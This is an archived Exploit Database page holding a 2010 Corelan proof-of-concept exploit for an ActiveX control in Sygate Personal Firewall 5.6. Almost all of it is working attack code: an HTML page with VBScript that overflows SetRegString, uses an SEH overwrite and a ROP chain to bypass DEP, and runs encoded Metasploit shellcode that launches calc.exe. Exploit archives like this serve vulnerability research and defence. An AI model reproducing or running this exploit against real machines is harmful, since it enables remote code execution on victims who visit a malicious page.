Sygate Personal Firewall 5.6 build 2808 – ActiveX with DEP Bypass

• Exploit Database
• 109 阅读

• 作者： Lincoln
  日期： 2010-06-11
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13834/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133

  <html> <!-- |------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--|   # Software: Sygate Personal Firewall 5.6 build 2808 ActiveX w/ DEP bypass # Author: Lincoln # Date : June 11, 2010 # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-050 # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # # Bad Chars: 80-9f (makes for extra fun) # Tested on IE 7/6 , nop slide used # # -->   <object classid=&apos;clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9&apos; id=&apos;target&apos; ></object> <script language=&apos;vbscript&apos;>   seh = unescape("%13%16%47%06") &apos;#ADD ESP,46C # RETN     rop = rop + String(72, "D") &apos;#Junk rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop rop = rop + unescape("%19%16%47%06") &apos;#Nop   &apos;#edx rop = rop + unescape("%33%b6%44%06") &apos;#POP EBP # RETN rop = rop + unescape("%01%c0%4b%06") rop = rop + unescape("%65%b9%47%06") &apos;#MOV EDX,EBP # POP REGISTERS CHAIN #RETN   &apos;#alignment rop = rop + unescape("%7c%bd%47%06") &apos;#POP data into registers rop = rop + unescape("%49%50%45%06") rop = rop + unescape("%41%41%41%41") rop = rop + unescape("%ff%ff%ff%ff") rop = rop + unescape("%50%50%50%50")   &apos;#ebx rop = rop + unescape("%b2%7d%48%06")&apos;#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") &apos;#Junk rop = rop + unescape("%b2%7d%48%06")&apos;#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") &apos;#Junk rop = rop + unescape("%b2%7d%48%06")&apos;#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") &apos;#Junk rop = rop + unescape("%d9%c4%47%06") &apos;#ADD EBX,EAX # PUSH 1 # POP EAX # RETN   &apos;#ebp rop = rop + unescape("%dd%c4%47%06") &apos;#POP EAX # RETN rop = rop + unescape("%1f%73%d0%cc") rop = rop + unescape("%ae%f5%47%06")&apos;#SUB EAX,ECX # RETN rop = rop + unescape("%30%14%45%06") &apos;#MOV EBP,EAX # CALL ESI   &apos;#esi rop = rop + unescape("%22%cd%46%06") &apos;#POP ESI # RETN rop = rop + unescape("%ff%ff%ff%ff")   &apos;#eax rop = rop + unescape("%dd%c4%47%06") &apos;#POP EAX # RETN rop = rop + unescape("%63%72%d0%cc") rop = rop + unescape("%ae%f5%47%06")&apos;#SUB EAX,ECX # RETN   &apos;#game over rop = rop + unescape("%47%71%49%06") &apos;#PUSHAD (throw it all on the stack baby!)     &apos;[*] Using Msf::Encoder::Alpha2 with final size of 338 bytes cmd=calc.exe sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _ unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _ unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _ unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _ unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _ unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _ unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _ unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _ unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _ unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _ unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _ unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _ unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _ unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _ unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _ unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _ unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _ unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _ unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _ unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _ unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _ unescape("%70%45")     junk= String(2814, "D") &apos;3128 mjunk = String(25000, "A")   arg1=1 arg2=1 arg3= rop + sc + junk + seh + mjunk arg4="defaultV" arg5="defaultV"   target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5   </script> <b><center>Sygate Personal Firewall 5.6 build 2808 ActiveX exploit w/ DEP bypass</b></center> </html>